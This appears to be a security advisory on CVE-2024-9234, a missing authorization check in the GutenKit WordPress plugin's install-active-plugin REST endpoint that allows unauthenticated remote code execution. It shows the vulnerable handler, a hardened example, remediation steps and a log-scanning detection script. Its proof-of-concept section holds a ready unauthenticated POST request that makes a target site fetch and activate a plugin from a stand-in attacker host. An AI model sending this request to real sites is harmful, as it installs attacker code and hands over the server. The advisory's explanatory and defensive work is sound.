CVE-2024-9234 is a critical missing-authorization vulnerability in the GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress, affecting all versions up to and including 2.1.0. A missing capability check on the install_and_activate_plugin_from_external() function, reachable through the plugin's install-active-plugin REST API endpoint, lets unauthenticated attackers make the site download, install and activate an arbitrary plugin of their choosing. Because activating an attacker-supplied plugin executes attacker-controlled PHP on the server, this amounts to unauthenticated remote code execution.
Plugin Description
GutenKit is a WordPress plugin that extends the Gutenberg block editor with custom blocks, templates, and patterns for building page layouts and content.
Vulnerability Details
The vulnerability stems from a missing capability check on the install_and_activate_plugin_from_external() function, which handles the install-active-plugin REST API endpoint. The endpoint takes a URL in the gk_plugin_url parameter, downloads the package from it, installs it and activates it, without ever checking that the caller is logged in or holds the install_plugins capability. The only validation is filter_var() with FILTER_VALIDATE_URL, which confirms that the string is a well-formed URL, not that its source is trusted. Since the server fetches whatever the URL points to, an attacker can host a malicious archive disguised as a plugin and have the target site install and run it.
Below is the relevant code snippet from the vulnerable version. Note that there is no current_user_can() call anywhere on the path from the request body to plugin activation:

    public function install_and_activate_plugin_from_external() {
        // Attacker-controlled: taken straight from the request body.
        $plugin_url = esc_url_raw( wp_unslash( $_POST['gk_plugin_url'] ) );
        // Syntactic check only: any well-formed URL passes.
        if ( filter_var( $plugin_url, FILTER_VALIDATE_URL ) ) {
            // Missing here: a capability check such as current_user_can( 'install_plugins' ).
            $this->install_plugin( $plugin_url );                         // downloads and installs the package
            $plugin_file = $this->get_plugin_file_by_url( $plugin_url );
            $this->activate_plugin( $plugin_file );                       // activation executes the plugin's PHP
            wp_send_json_success();
        } else {
            wp_send_json_error();
        }
    }
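The following is an added example, not GutenKit's own code and not the vendor's actual 2.1.1 patch. It shows the vulnerable route registration next to a hardened one. The registration itself is reconstructed as an assumption (the page shows only the handler); the class name, the allow-list of download hosts and the error codes are illustrative. install_plugin(), get_plugin_file_by_url() and activate_plugin() are the plugin's own helpers referenced above and are not reproduced.

```php
<?php
// Added example: one way to close the missing capability check, not GutenKit's code.
class GK_Plugin_Installer_Example {

    // Assumption: the feature exists to pull packages from wordpress.org, so only that
    // host is accepted. Adjust to the real source list.
    const ALLOWED_HOSTS = array( 'downloads.wordpress.org' );

    public function register_routes() {
        // VULNERABLE (before): no permission_callback, or one that always returns true.
        // WordPress then treats the route as public, and the handler never checks
        // capabilities itself, so every anonymous visitor can reach it.
        //
        // register_rest_route( 'gk/v1', '/install-active-plugin', array(
        //     'methods'             => WP_REST_Server::CREATABLE,
        //     'callback'            => array( $this, 'install_and_activate_plugin_from_external' ),
        //     'permission_callback' => '__return_true',
        // ) );

        // HARDENED (after): the capability check runs before the callback does, and the
        // argument schema rejects requests without a URL.
        register_rest_route( 'gk/v1', '/install-active-plugin', array(
            'methods'             => WP_REST_Server::CREATABLE,
            'callback'            => array( $this, 'install_and_activate_plugin_from_external' ),
            'permission_callback' => array( $this, 'can_install_plugins' ),
            'args'                => array(
                'gk_plugin_url' => array(
                    'required'          => true,
                    'type'              => 'string',
                    'format'            => 'uri',
                    'sanitize_callback' => 'esc_url_raw',
                ),
            ),
        ) );
    }

    // Both capabilities are required because the handler both installs and activates.
    public function can_install_plugins() {
        if ( ! current_user_can( 'install_plugins' ) || ! current_user_can( 'activate_plugins' ) ) {
            // 401 for anonymous callers, 403 for logged-in users without the capability.
            return new WP_Error(
                'gk_forbidden',
                'You are not allowed to install plugins on this site.',
                array( 'status' => rest_authorization_required_code() )
            );
        }
        return true;
    }

    public function install_and_activate_plugin_from_external( WP_REST_Request $request ) {
        // Defence in depth: re-check inside the handler so a future route change
        // cannot silently reopen it.
        if ( ! current_user_can( 'install_plugins' ) || ! current_user_can( 'activate_plugins' ) ) {
            return new WP_Error( 'gk_forbidden', 'Forbidden.', array( 'status' => rest_authorization_required_code() ) );
        }

        $plugin_url = $request->get_param( 'gk_plugin_url' );
        $scheme     = wp_parse_url( $plugin_url, PHP_URL_SCHEME );
        $host       = wp_parse_url( $plugin_url, PHP_URL_HOST );

        // A valid URL is not a trusted URL: require https and an allow-listed host.
        if ( 'https' !== $scheme || ! in_array( $host, self::ALLOWED_HOSTS, true ) ) {
            return new WP_Error( 'gk_bad_source', 'Plugin source not allowed.', array( 'status' => 400 ) );
        }

        // The plugin's existing helpers, as referenced on the page.
        $this->install_plugin( $plugin_url );
        $plugin_file = $this->get_plugin_file_by_url( $plugin_url );
        $this->activate_plugin( $plugin_file );

        return rest_ensure_response( array( 'installed' => $plugin_file ) );
    }
}
```

With a permission_callback in place, cookie-authenticated REST requests must also carry a valid X-WP-Nonce header (a nonce created with wp_create_nonce( 'wp_rest' )); without it WordPress treats the request as anonymous and current_user_can() returns false, which is what stops a cross-site request from riding an administrator's session.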
Exploit POC (Proof of Concept)
To exploit this vulnerability, an attacker sends a single unauthenticated POST request to the install-active-plugin REST API endpoint: no session cookie, X-WP-Nonce header or credentials of any kind are needed. The gk_plugin_url parameter points at a file hosted on the attacker's own server:

POST /wp-json/gk/v1/install-active-plugin HTTP/1.1
Host: targetwordpresssite.com
Content-Type: application/x-www-form-urlencoded

gk_plugin_url=http:%2F%2FEvilServer.com%2FEvilPlugin.php

On receiving this request, the target site downloads the file at that URL, installs it as a plugin and activates it, so the attacker's PHP runs inside the WordPress process. In practice the URL would point at a ZIP archive laid out like a plugin, since the WordPress plugin installer unpacks a ZIP package. A vulnerable site answers with the {"success":true} body produced by wp_send_json_success().
Remediation
All users of the GutenKit plugin should update immediately to version 2.1.1 or later, which adds the missing authorization check to the endpoint.
Website administrators should also review the installed plugin list, and the wp-content/plugins directory itself, for anything unfamiliar that may have been installed through this vulnerability, and remove it. A site on which an attacker-supplied plugin was activated has executed attacker-controlled PHP and should be treated as compromised, not merely cleaned up.
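To tell whether a site actually received the request shown in the proof of concept, here is an added example that is not part of the original advisory: a PHP command-line script that scans a web server access log in the common combined format for requests to the endpoint, including the ?rest_route= form WordPress uses when pretty permalinks are disabled. The log lines are constructed for the example and use documentation IP ranges.

```php
<?php
// Added example, not from the advisory: flag requests to the GutenKit
// install-active-plugin endpoint in an Apache/nginx combined-format access log.

// Both ways the route can be addressed: the pretty-permalink path and the
// rest_route query fallback (compared after URL decoding).
const GK_ROUTE_NEEDLES = array(
    '/wp-json/gk/v1/install-active-plugin',
    'rest_route=/gk/v1/install-active-plugin',
);

// Parse one combined-format line into its fields; null for lines that do not match.
function gk_parse_log_line( string $line ): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/';
    if ( ! preg_match( $re, $line, $m ) ) {
        return null;
    }
    return array(
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $m[4],
        'status' => (int) $m[5],
    );
}

// True when the request path targets the vulnerable route.
function gk_targets_route( array $req ): bool {
    $decoded = rawurldecode( $req['path'] );
    foreach ( GK_ROUTE_NEEDLES as $needle ) {
        if ( false !== stripos( $decoded, $needle ) ) {
            return true;
        }
    }
    return false;
}

// Scan the log text and return the matching requests. A POST answered with 200 is
// the signature of the vulnerable handler completing (wp_send_json_success), so the
// plugin list must be reviewed; a 401 is what a patched site returns to anonymous callers.
function gk_scan_log( string $log ): array {
    $hits = array();
    foreach ( preg_split( '/\R/', trim( $log ) ) as $line ) {
        $req = gk_parse_log_line( $line );
        if ( null !== $req && gk_targets_route( $req ) ) {
            $req['verdict'] = ( 'POST' === $req['method'] && 200 === $req['status'] )
                ? 'likely compromised'
                : 'attempt';
            $hits[] = $req;
        }
    }
    return $hits;
}

// Constructed sample: an ordinary page view, a probe rejected with 401, a successful
// install call, and the same call through the rest_route fallback.
$sample = <<<LOG
203.0.113.7 - - [11/Oct/2024:13:20:01 +0000] "GET /wp-login.php HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Oct/2024:13:21:10 +0000] "POST /wp-json/gk/v1/install-active-plugin HTTP/1.1" 401 95 "-" "python-requests/2.31"
198.51.100.9 - - [11/Oct/2024:13:22:45 +0000] "POST /wp-json/gk/v1/install-active-plugin HTTP/1.1" 200 16 "-" "python-requests/2.31"
198.51.100.9 - - [11/Oct/2024:13:23:02 +0000] "POST /index.php?rest_route=%2Fgk%2Fv1%2Finstall-active-plugin HTTP/1.1" 200 16 "-" "curl/8.4.0"
LOG;

foreach ( gk_scan_log( $sample ) as $hit ) {
    printf(
        "%-14s %-26s %s %s -> %d [%s]\n",
        $hit['ip'], $hit['time'], $hit['method'], $hit['path'], $hit['status'], $hit['verdict']
    );
}
```

Run it against a real log by replacing $sample with file_get_contents() of the access log. On the constructed input the three POSTs are reported and the last two are marked as likely compromised, which is the cue to inspect the plugin directory for whatever was installed at those timestamps.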
References
- Original Vulnerability Disclosure
- WordPress Plugin Repository - GutenKit - Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor
- GutenKit Developer Update on CVE-2024-9234
Final Words
This vulnerability serves as a reminder of the importance of ensuring that all WordPress plugins undergo thorough security audits and are regularly updated. As part of a robust security policy, always keep your WordPress core, plugins, and themes up-to-date, and stay informed about current security issues, new releases, and fixes.
Timeline
Published on: 10/11/2024 13:15:18 UTC
Last modified on: 10/15/2024 12:58:51 UTC